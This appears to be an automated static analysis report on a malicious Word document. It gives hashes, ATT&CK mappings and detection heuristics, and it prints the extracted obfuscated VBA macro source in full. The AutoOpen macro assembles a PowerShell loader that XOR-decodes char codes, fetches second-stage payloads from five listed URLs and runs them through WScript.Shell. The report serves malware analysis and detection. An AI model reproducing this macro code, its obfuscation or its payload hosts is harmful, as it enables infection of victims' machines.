Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 708baf749138344d…

MALICIOUS

Office (OLE)

Size: 244.0 KB
Created: 2018-07-04 22:55:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: d04b852f7429bd027b12ac646ba43fcf
SHA-1: b72ec181627c9ea2e40e89959e50f1a47f5b4305
SHA-256: 708baf749138344d3ccd12bbf3c8ddfcd661da89bdf04c1d58ad41ff0511892c
Risk Score: 350

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of a PowerShell command whose string literals reconstruct as 'wershell [String]::jOIN('','; the leading "P" and "O" are supplied separately by Chr(vbKeyP) and Chr(vbKeyO) in the WScript.Shell Run call. The command is likely intended to download and execute a second-stage payload. This is further supported by heuristics indicating Shell() calls and WScript.Shell usage within the VBA code.

Heuristics 11

  • ClamAV: Doc.Malware.Valyria-7165739-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-7165739-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       HJoLp = (uwWkK * dGzAV - aoWsc - ijbusF * (jPiii * 35582) + (rAjdk - 66424))
    kOziAsF = zQlUXujAA + CreateObject("Wscript.shell").Run(GPtbDYBTsjz + Chr(vbKeyP) + suGlM + Chr(vbKeyO) + EBOuRljVLwOYZ + asQKDH, 847904596 - 847904596)
       bvlXjX = (LsvbL * mNsZzI - nNztk - hWTrw * (DWGCj * 5163) + (Voiljk - 62406))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       HJoLp = (uwWkK * dGzAV - aoWsc - ijbusF * (jPiii * 35582) + (rAjdk - 66424))
    kOziAsF = zQlUXujAA + CreateObject("Wscript.shell").Run(GPtbDYBTsjz + Chr(vbKeyP) + suGlM + Chr(vbKeyO) + EBOuRljVLwOYZ + asQKDH, 847904596 - 847904596)
       bvlXjX = (LsvbL * mNsZzI - nNztk - hWTrw * (DWGCj * 5163) + (Voiljk - 62406))
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "MsZHQCWLA"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.islandhouse.cn/28mMVV/ - Referenced by macro
    • http://www.lacherprise.net/VaBnGGME/ - Referenced by macro
    • http://doinothientrieu.com/pUp/ - Referenced by macro
    • http://www.phukhoaanthao.com/HjvS0z/ - Referenced by macro
    • http://primerplano.org/GDJux/ - Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14816 bytes
SHA-256: b9bd4a5bd2594cf30ffe1ef811bd430d608730463d9c8c20a836f9a6f3743b59
Detection
ClamAV: No threats found
Obfuscation or payload: likely
354 of 546 identifiers look randomly generated (e.g. 'EBOuRljVLwOYZ') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zzwVdzoECzRE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MsZHQCWLA"
Sub AutoOpen()
On Error Resume Next
   bswbAt = jkGsH / UqiIQF + DQhCm - fiKLd * YNBFX - bivLns / wBEZz / VWWdLK
   EQcPZw = EwMWo / sSizp + Kscdv - hzqDFv * EPzKud - VCcXMr / zzDlZ / jtmcm
   hoOjz = JbQPF / QhiqO + oLAOf - dvqWKo * bkqUkt - IvJJAH / EwnMKl / PQOTJk
   ETmQc = iXaNwz / wtBrN + fYzDK - CpMTc * bJuEb - tYTUj / ZOMVp / PWFkE
   jSwjZ = lvwns / fCTMPG + UwwNT - nPqFj * MuaXDJ - kBZvb / WNdSni / PDRVm
   TRIERf = XAiwwt / SZJoTO + qfoUw - HzkzBA * pjtGV - zKRLq / lOzJU / vQWdm
   ohNnWZ = UjWTlL / oaVsdp + qRbEMZ - ABkqu * nuQIpO - kNflo / EjvAkh / zzQmi
   zWUhm = qktuKN / PbMdl + QaUaEB - IZbpdi * fOsQj - IzBLml / hStnUi / SiivPf
UfuXscsPD (zwGWOPn + zipdwnzRTR + aiAVi)
   aKcIzU = rbSWF / mRQUD + dsJdl - CSjsW * flLJm - oKvcwp / LVJDo / TYVJD
   MdALvJ = cJUlz / iKVNnR + TZhaB - APHpd * jEZIj - WzJPwo / YhaMp / kocZn
   cYlAv = MEjrFf / DwVXv + VPzuK - CWiTIc * kwhuw - iFOtq / YmXfE / jWTRpf
   bDsTil = PAvRW / WXQwG + GYlKf - dZcGlS * BQXwl - kISGYr / JCXIF / LTYFq
End Sub

Function zwGWOPn()
On Error Resume Next
UjmRii = 67691 * VvjpQZ + WYzph / 22425 - 98903 + wTXUM
   PrBbD = JAZsI + cXomL + UzMuHP + Pwtbf + (79540 / uwzjhJ)
   tDvFDD = qbhVE + fTLcV + PpZOj + fUWpwL + (25945 / rcrok)
   VzfzS = cnTul + CNzzTp + MYilB + VIhjDb + (43645 / IlRJcv)
VqsPm = "wers" + "hell" + "      " + "        " + "    [S" + "trinG]::" + "jOIN" + Chr(40) + " '',"
VLHInu = uUTzFf + zDUkl + oIPYt + SHfaH + (9270 / jwmEm)
   mCbXV = LhWtMv + PzhMZr + fbSjF + ibrBPf + (72878 / vTjAP)
   VrUda = aKhwtc + wAJMvj + kcTOu + uDwJL + (97844 / QPRTip)
   TtkKmz = IBWmq + XjtYG + OhWLXk + tfjiqh + (12024 / vrrIbz)
wBOjTkQWkva = " " + Chr(40) + Chr(40) + "35 ,93" + " , 99 ," + "75,58," + " 105 ," + " 98 , 1" + "12, 42," + "104 " + ", 101,10"
hwKpd = fXwJii + sVKjuS + vkqUdh + NTdzM + (20072 / WhRdDT)
   PSpkGt = AmrnAu + tQKti + iZjBz + rnfRRQ + (66139 / nYnNd)
   LchXj = trkjpi + VzIpMw + RDVMSY + WotGr + (97079 / kHIzwm)
   VjtId = FYYbQH + nHHVFI + WDqdzk + lqzsPJ + (20106 / UcDosD)
EVUZJZwsd = "9,98,10" + "0 ,115 ,3" + "9, 73,98" + ", 11" + "5 , 41 ," + "80 ,98" + ",101,68 ," + " 107,1"
IpNAb = QdaLt + KjPqio + YBpVVa + RViVc + (94056 / dLtMj)
   aUHiw = quDkZ + SVNrr + PpvuL + DIZoh + (43045 / zjfBWS)
   nRNMT = WGwJw + wbFDST + ZEsvwF + wfjXWi + (99404 / zGocC)
   ERSLhf = VKZtZU + UvWOG + brZbnS + jbwPqR + (89879 / nZkQa)
qwvaEuic = "10 ,98,1" + "05,1" + "15 ," + " 60 ," + " 35 ," + " 74 , 67" + ", 70, 58,"
rIzoYN = TwZHvh + BkJjI + bokBNh + bpnTqZ + (90085 / HqGVwV)
   BXjbU = hrEKqf + rznaIz + wOffs + TElcw + (78538 / sAvdaa)
   JzhmoZ = wVVNVV + XwbrP + iLGQV + juuCKK + (51976 / fkUasY)
   tRwdDZ = jsfiiG + wtQQB + CCSKCu + XmdAwq + (68070 / tHnRND)
RnmwsCBnb = " 32 , " + "111,1" + "15 , 115" + ",119, " + "61 ,40 ," + " 40 , 112" + ",112 , 1" + "12 ," + "41,1"
qvZpIK = uuTNJ + zNnrA + wUcFbL + pkqEK + (98678 / IOBppX)
   pdGXTh = FqMnm + zfLHL + nNwhQF + DIHDm + (81422 / viiuqz)
   QZKRPp = siNDd + iUOqzi + UWDpJ + bHiMz + (3484 / AfuRnM)
   czFdA = HDnAKs + QNtWU + AORKS + BzqwZ + (93479 / kIdXQ)
WuNItwGXAz = "10, 116, " + "107,10" + "2 , 105," + " 99, 111" + " , 10" + "4 ,1" + "14, " + "116,98 " + ",41 ,10" + "0,105 ," + " 40 ,53 " + ",63 ,1"
QKLmDM = zWYBS + dMrvpS + dtzna + IcSBRQ + (27678 / WCmuN)
   CDushO = UqTVj + CqmTp + PTwkj + Xmiqbb + (82562 / KUNjZj)
   NEljBU = zjniE + rwXNY + GDXhV + kDaGJ + (9385 / cZsZH)
   lFrJt = SMsWLz + OiGppX + bRQft + ihcwz + (48617 / zmGPu)
bKqjkjI = "06 , " + "74 ,81 " + ", 81 ," + "40 ,71 " + ", 11" + "1, 115, " + "115,119" + " ,61,40 " + ", 40 " + ", 112 ," + " 112, 1"
mEsOH = wWaMS + DiKGS + wJcYi + riori + (55581 / uFvcP)
   NUPXE = BnHbwh + MmEdW + MImJiw + nfPNF + (21725 / BJGvz)
   WcibP = dIJnQ + NvVaa + OacWca + ozGYL + (16298 / vCviU)
   MPAGhr = rUhjU + HOobzA + WaLXk + iOEKzn + (12385 / bwaWok)
mWaFp = "12 ,4" + "1 , 107" + ",102" + " , 1" + "00 , 111," + "98 , " + "117 ,1" + "19 ,117 " + ",110 ,11" + "6,98 , 4" + "1,105,98"
RdbzjD = qfouz + EXtaKh + qsVYtW + SOCjId + (82079 / jhpaf)
   PHsMhA = phXFv + jTJXM + bjQiF + iJPYqb + (41450 / pjpcq)
   XIrUQF = rHjvO + pYHDE + SnbdI + UImoMl + (71004 / kTkiD)
   QiaHTl = EBtbik + MCvfi + wzUDuz + MnWod + (56 / woMUJX)
kFKYjr = " ,11" + "5, 40 " + ", 81 , 1" + "02 ," + "69 ," + " 105,64," + "64,7" + "4,66, " + "40 ,71 "
zlXGw = ifudip + nwMzc + ODqIRr + jjfAdj + (63295 / YpJKjW)
   Swvwt = shEEl + zQkLca + RckkEW + DanDv + (3222 / ptTNcw)
   zPltB = hPchN + bJHdFO + zwztA + IIPGCo + (92817 / wEaWX)
   cCUCTQ = FpRLEv + XRzWlv + LRIasQ + cFjGh + (46890 / wiwajG)
UvkUztiRs = ", 111 ," + " 115" + " ,115 ," + "119," + " 61 ,40," + "40 ,9" + "9,104 ,1" + "10 , 10" + "5 , 1" + "04 , " + "115 , "
hvAcVF = JMTUzk + ahOqcW + RuBIj + HXQzzc + (2346 / hjHjQw)
   lNNSK = wOmbE + kwXwMJ + wEJGC + cYDhhD + (85812 / RHIzj)
   NUiwRw = LFXAc + PAzUmR + mvVUX + FtzGHL + (49976 / EaSLS)
   sLLazz = Ujknw + dHRwNY + sVNwQo + NLahI + (38858 / ZakvVY)
McAlramSsQ = "111 , 11" + "0,98 ," + " 105,115" + ", 117," + " 110" + ",98,1" + "14 , 41,1"
dGwZw = VkiCcX + KbLcHK + hnshEY + mTpPw + (62551 / hqGkH)
   UDClG = cRaBN + dBcWZX + WMEZv + IzqOXG + (47640 / oFPiT)
   KstBEJ = iZFfB + sYpNRU + QiQpn + rhdkFs + (99092 / dourcu)
   dNOJN = ofsdo + hJbbD + aSkEp + nBEOjv + (41233 / ZTmUCj)
FnJCizvvBo = "00,10" + "4,106" + ", 40 " + ",119 , 8" + "2,119, 40" + " , 71, " + "111, 1" + "15, 11" + "5 , " + "119 ,61, " + "40, 40 ,1" + "12 ,112"
zwGWOPn = VqsPm + wBOjTkQWkva + EVUZJZwsd + qwvaEuic + RnmwsCBnb + WuNItwGXAz + bKqjkjI + mWaFp + kFKYjr + UvkUztiRs + McAlramSsQ + FnJCizvvBo
   hLjdMW = rnzwN + nJNQdG + zSlDDu + TovMoF + (78421 / LcaMZs)
   nLooW = mUnjdt + ZqVGFS + zLFBVN + iWhzN + (33702 / qDCKwE)
   LtRJJ = Nbplbf + OZjZRh + DrkIII + wkpRh + (90488 / HsmulD)
   MGaMZ = SmvAu + INTJIA + iPrzU + kEHjuf + (63216 / iqlJvj)
End Function
Function zipdwnzRTR()
On Error Resume Next
jTzRlz = oVfDc + FcGnTI + IwGjPc + imTvHO + (80929 / rIkjQ)
   fcENHB = Lnfdz + mInusp + zTbcpU + MUpld + (99377 / VtNnUw)
   pACwk = rNzPr + cplNNB + LVBCk + OEqlzC + (70302 / SSzEnf)
   vUpDE = lAddv + ZFnowR + WRAcA + GzKXo + (18176 / WEPBLw)
oQzWlDzLfr = " ,112 ,41" + " , 119, " + "111, 114 " + ",108, 111" + " ,10" + "4, 10" + "2 , " + "102 ,105 " + ", 115"
vKitoW = NQVIWH + LBbXnj + qztAz + RPaHX + (83062 / BIwjAz)
   zkItD = OmGYX + QYdCl + zAHjiL + odEzaM + (68586 / Xllztp)
   zEUdHs = JrlPj + mENkt + VVwqOk + JhDEsX + (81657 / HmdQsH)
   IXorrZ = wvLpL + MANGsc + VFmsrq + iSjUA + (65114 / MaBWt)
OLLuLn = " ,111 ," + " 102 , " + "104 ,41 ," + "100,104" + " , 106 " + ",40 ,7"
bjYtMv = JsKoFX + wRFwBO + JnfMna + nsErGU + (48345 / IkzvET)
   fMptR = fvSlP + zRkRJ + zNNrn + Qccaqu + (48773 / roiYNQ)
   olGME = TfBsb + RtsjYV + WAFzwD + XJVzF + (18016 / zwtFa)
   TTNDz = XHhPDa + NzLjoI + kCKKE + SjTuwb + (96092 / XCmCz)
lIWFTi = "9 , 109,1" + "13, 84 ," + " 55,125," + " 40, " + "71 ," + "111 , 115" + " , 115 , "
jHWOhf = djPFtj + kGnYC + ouEEXM + OJmMEs + (20906 / FqcFH)
   RFaqYi = MKzliV + OfIQh + XttvaR + TVlETi + (10374 / mBbGz)
   zvLlB = cGiqzK + DlCRqV + fUtCAA + liPLT + (90341 / pztTW)
   GHawN = FHjDYm + KsfBIk + RrcSf + PhOmIw + (39084 / qXtzoG)
KzQpjvZPl = "119 ,61," + "40 ," + " 40 , " + "119, 117" + " ,11" + "0, 1"
VDpXPw = bsljHc + YLfQH + RrYsRE + DcdjK + (69715 / CpEYKT)
   wZzoGC = hBcRQ + WhisOz + zLCiTp + jvGKrC + (60971 / UTazJ)
   rcAYMB = caWLzz + dfwFL + rzOFVX + ViHHFn + (13403 / PYUFCi)
   CHULkl = JHTwl + sNvCoX + tTOGL + nOHczJ + (97989 / wHkKm)
wXbYj = "06 ,98 " + ",117 ," + "119,1" + "07 ,102,1" + "05,104," + "41 , 10" + "4, 11" + "7 ,96 ,4" + "0 ,64 , 6" + "7, 77," + " 114,127"
FMiKii = iNOWLv + lWUUQP + luSaO + FMPSPq + (12052 / wYUlLJ)
   viGmQ = aSsVF + ipihQR + DIDIQd + FNpXAN + (12735 / WEmMhF)
   hsojH = fzwFit + TRMkT + XVwvHU + CmwAjF + (10765 / ECdtH)
   aPQMj = tXjLjR + miiwhL + iswwW + opPPiq + (23516 / zGija)
LpBAffqz = ", 40 " + ", 32" + " ,41,8" + "4, 119," + " 107 , " + "110 , 11"
VwuJl = WnPqQ + WPsWpJ + MMdUU + quSauE + (69682 / BnGNHs)
   GRJjGT = UOzZzr + NsZwTj + BdJGq + wHfPti + (21180 / uEQlFW)
   iZahkU = YihzCK + psbZRv + DMUmj + VblIi + (32955 / dmDnkY)
   WoszB = rLvio + wXiNFv + LOwsZ + lYOCo + (77990 / tprPUW)
GIIuVwY = "5 ,47" + " , 32" + " , 71," + "32 ," + " 46,60," + "35 ,80,6" + "5 ,10" + "6 ,39,5" + "8,39 , 32" + " ,51 ,52"
JPcrw = jzSSA + UFnAaQ + wNikj + jjSnJ + (20363 / NwrNj)
   SKnbzs = XtJcCQ + jzWMhA + qTttKq + fDlCbP + (41760 / hsjnwH)
   trQKN = suqsGD + VlZDbf + bQYNJI + naWNa + (39413 / WcjCV)
   oUqrMk = pcnuQ + jndTDA + oFUUi + jfwItA + (11567 / IHZhAZ)
wCSzGnl = ", 32" + ",60,35 ,1" + "12 , 69," + " 65 ,5" + "8 , 3" + "5 ,9" + "8 , 105 ," + " 113," + "61, 115 ,"
zQwpt = IDUTY + crthn + IrqXa + BcoSdj + (86921 / hlTcu)
   ASJCU = iPnZmm + dhrrj + FtOac + zVmXd + (97915 / VRcqW)
   wCXAR = COtCoL + mpPOcq + oQkpa + aWTqXQ + (74298 / FFUpG)
   YmjldS = HMRWrm + fjShZ + JjuCiX + ZjkvY + (42528 / zChwM)
XwAWVwPKE = " 98 , " + "106,119," + "44 ,32" + " ,91" + " ,32," + " 44 , 35" + ", 80" + " ,65," + "106," + "44, 32,41" + " ,98, 127" + " , 98 "
zipdwnzRTR = oQzWlDzLfr + OLLuLn + lIWFTi + KzQpjvZPl + wXbYj + LpBAffqz + GIIuVwY + wCSzGnl + XwAWVwPKE
   iwtJmH = IIsTHK + rGOls + jWLrrJ + SQwAqV + (97929 / ILkcSi)
   ZQMkK = pEwDw + wjftfU + VvtGSj + NiIdNC + (13861 / ifilO)
   ocTPT = dPDqzo + MmBRc + fsKrcm + CiudJ + (50577 / ThjYb)
   boAuKs = mlWKTz + zUdkqd + wuVZh + ltiDd + (79655 / GqrQhj)
End Function
Function aiAVi()
On Error Resume Next
hhvbE = qCawLv + OLjJt + hvLvU + wabAzL + (88629 / FnNzf)
   zOFQU = UKkYz + bfKDu + PBfmNu + nCbAjw + (61846 / GfLtM)
   mmKDL = SwsLC + oihbW + alITOB + lRpwaz + (65589 / fRukHk)
   XzhPw = WLYiRc + uGSXJ + azczSO + rJQnq + (28037 / WNKlz)
aKitC = ", 32," + " 60, " + "97, 10" + "4,117" + ",98 ,10" + "2 , 100 " + ", 111 ,47" + ",35," + " 105 , 1" + "09,102 , " + "39 , "
ItJHlR = OjqTS + WzXKA + fhHtJ + bSzVA + (97182 / iTHHV)
   hiWJi = DFDJdD + DMwOk + pBafh + PwNBnD + (48885 / oruWlD)
   cdUYTl = NkJbiV + ihzBA + DJzTtj + IksPpC + (59570 / hKInI)
   prIWnf = bBVFHV + TiBfkt + dsulf + mAWoNs + (45660 / RqzFD)
DYsFDAAzJ = "110, 10" + "5 ,39 ,3" + "5 , 7" + "4 , 67,7" + "0,46" + ", 12" + "4 , 11" + "5, 11"
mhzMKK = UBTbMz + DGDpR + ipDPF + XaLRc + (56018 / ICUdSW)
   HrjaDo = jCfqCq + lTUhZ + jmjSSm + UoRuY + (56398 / zKafKu)
   mdLhMr = RlkrhT + QzdhHG + DIkrwf + MidlSj + (63278 / dWDOc)
   obavJ = rFrwKP + iVbqNL + FCHFOj + LTHds + (56869 / OhJvpi)
XjOXJuNB = "7, 12" + "6 , " + "124 ,35" + ", 93" + " ,99, 75 " + ",41 , 67" + " ,104"
bQbnq = hcNoOP + RVINIR + dvkkRZ + CbtpW + (58876 / EVIfcz)
   ofPZpp = iYUCv + NiRkwW + VAcAoU + QiwfK + (90844 / SzXwz)
   sbcfIo = cCNWt + cjjrV + kiBUz + kBNzzi + (61642 / wlUHE)
   lfZYf = cLLXo + JLPAq + dnXmJ + CfqcWq + (22403 / mNfEF)
zIqFZt = ", 11" + "2 , 10" + "5,107," + "104 ,1" + "02,99" + " , 65,11" + "0 , " + "107 ," + "98 ,47 ," + " 35,105" + ",109," + "102 ,"
STGWZ = wztVch + JGnDPk + duEco + Afvjtl + (1831 / dBuGb)
   HUZSc = ujpEN + jXVHU + pRftlE + whdaO + (46575 / sJKbjl)
   YOWJT = bmHfuI + cqYPd + haQCNb + jjfEsz + (77451 / wPXuJ)
   QOXPml = YMFmQ + tnHLJ + cSvGDm + TrfaBU + (39268 / QMsnap)
iPLmLA = " 43,39, " + "35,112" + ",69 ,65 ," + "46,6" + "0, 84" + ",115 ,1"
YZIpW = HnTvEY + lYmOi + AfrRI + fiVWNt + (51827 / TQsXDO)
   pAOpA = vqVvzT + XDvhsD + sfcJG + jMMJwf + (73079 / RfdMYs)
   JINhV = OzTWws + kihHz + qJmRG + dopUf + (29291 / TErXi)
   nkRjBz = BPzpj + YoXHXr + jrCYd + HlZGtH + (6300 / MfZcl)
YYlDD = "02 ,117" + ",115 ,42" + ",87, " + "117, 104," + " 100 ,98 " + ", 11" + "6, 11" + "6 , 39 " + ",35, 112"
QPdJZb = UQzhZY + KYEjS + iiMzS + FFYRVT + (19881 / bPwzj)
   AsvHiG = NaivmP + WLAliY + TmplI + dRUwP + (78937 / CzMwi)
   AsvMQ = NBHHY + FoKmDf + rVawzb + PEzuZ + (9700 / LEqiz)
   MUEwQs = NWJpMT + plZvw + CqIEMh + bujTD + (6455 / iXRbfH)
GjHBlmoKuzN = " ,69, 65" + ", 60,1" + "01 , 11" + "7 , 9" + "8 , 10" + "2, 108" + " ,60 ," + " 122 , " + "100 ,10" + "2 , 115 "
XOUFYR = TILRqw + UjGGWZ + SvGjfz + cYwDG + (13742 / BzhQU)
   UjhYk = vPTBIc + zNAjR + RPcGA + qFaJp + (46266 / XjYFq)
   AUFCH = GfVrG + FpESN + tTYrj + NjphT + (64010 / qCEkz)
   DYMrkG = sdBRwi + JWAwIl + pYdZLo + QXAEG + (55562 / zhcol)
FKirI = ", 100" + ", 111,1" + "24 , 12" + "2 , 122" + " " + Chr(41) + " | Fo" + "ReaCH{[" + "cHaR]" + Chr(40) + "$_ -bXo" + "R'0x07'" + Chr(41) + " } " + Chr(41) + Chr(41) + "| &" + Chr(40) + " $PshoMe" + "[4]" + Chr(43) + "$"
obsDw = sctfz + wKQTmr + jMuiVF + dzEdYH + (18280 / dwZLfl)
   zSsMzz = RQmDb + jjsMV + NXmJVM + SipwBd + (57615 / iGQIWn)
   jwZdK = NrDwhd + suwXz + rsXPH + pTjTub + (22805 / YczErv)
   QIBhqi = mjABOM + PLhSoU + jYJVV + lPwrjB + (61526 / kWiQKq)
JXjBYq = "psho" + "me[34]" + Chr(43) + "'X'" + Chr(41) + " "
aiAVi = aKitC + DYsFDAAzJ + XjOXJuNB + zIqFZt + iPLmLA + YYlDD + GjHBlmoKuzN + FKirI + JXjBYq
   wjEdaP = BiVvRc + KJXAS + ibRlZz + AdcEzF + (73181 / GEslQ)
   TqHZU = HcTMkD + oVDut + wRwzZk + OprLl + (18822 / GYWmb)
   dLdGMB = XwsHDI + WOTDdo + XCRvMq + EEfOBE + (3133 / oiNvw)
   jjwwzp = rloHc + FIMKAL + TrNtBD + Faoqhs + (26338 / SUzOBj)
End Function


Attribute VB_Name = "jqjwBkzFO"
Function UfuXscsPD(EBOuRljVLwOYZ)
On Error Resume Next
   lpaCj = (rikZSb * PIzjjF - ZplbP - zTzvwm * (KIDXh * 13277) + (JlpkiM - 97314))
   qciWj = (IAvTXZ * tPvYC - JcIsFD - Ntszk * (UBTaJz * 75940) + (MJIzJR - 59786))
   AKNcLb = (vDznjj * ipdfB - HEaBa - uoABw * (BASph * 38517) + (wjMzXu - 44069))
   kCzGz = (cpwjL * thpvC - kiiGt - JEDpv * (DHDOJ * 72836) + (uwrYL - 42727))
   JzCkmQ = (YRSCsn * qORiz - VEGXUn - jwHkl * (akKEIX * 14140) + (OVYUu - 21770))
   VRhQr = (zUJoU * JrzuHm - rjEwfX - uHGsJ * (knmrW * 74605) + (iHizOt - 61118))
   QUjkw = (GEriPw * vaJiQ - MljJI - poGjh * (acHTd * 52152) + (pFTfTa - 87562))
   HJoLp = (uwWkK * dGzAV - aoWsc - ijbusF * (jPiii * 35582) + (rAjdk - 66424))
kOziAsF = zQlUXujAA + CreateObject("Wscript.shell").Run(GPtbDYBTsjz + Chr(vbKeyP) + suGlM + Chr(vbKeyO) + EBOuRljVLwOYZ + asQKDH, 847904596 - 847904596)
   bvlXjX = (LsvbL * mNsZzI - nNztk - hWTrw * (DWGCj * 5163) + (Voiljk - 62406))
   DWjIT = (JzFBO * rcGczG - XbIuX - hzRaH * (HtdfMs * 73470) + (uDjKh - 38591))
   mhLKMY = (INzrn * qwrAz - ISfLL - VnTFc * (IDQuo * 16340) + (lpqNtE - 77711))
   Ifrrk = (WYfHWz * rktDkk - jCvIiT - ZREmG * (HNIbN * 84298) + (mfknSI - 87252))
End Function